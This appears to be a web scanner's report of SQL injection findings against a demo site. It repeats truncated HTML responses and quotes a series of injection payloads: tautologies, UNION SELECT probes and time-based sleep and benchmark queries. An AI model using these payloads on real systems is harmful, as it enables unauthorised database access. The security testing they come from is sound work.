href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1632\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ''\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1633\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1634Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1635\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1636\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1637\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1638\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1639\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" OR \"\" = \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1640\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1641\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1642\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1643\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1644\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1645\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens 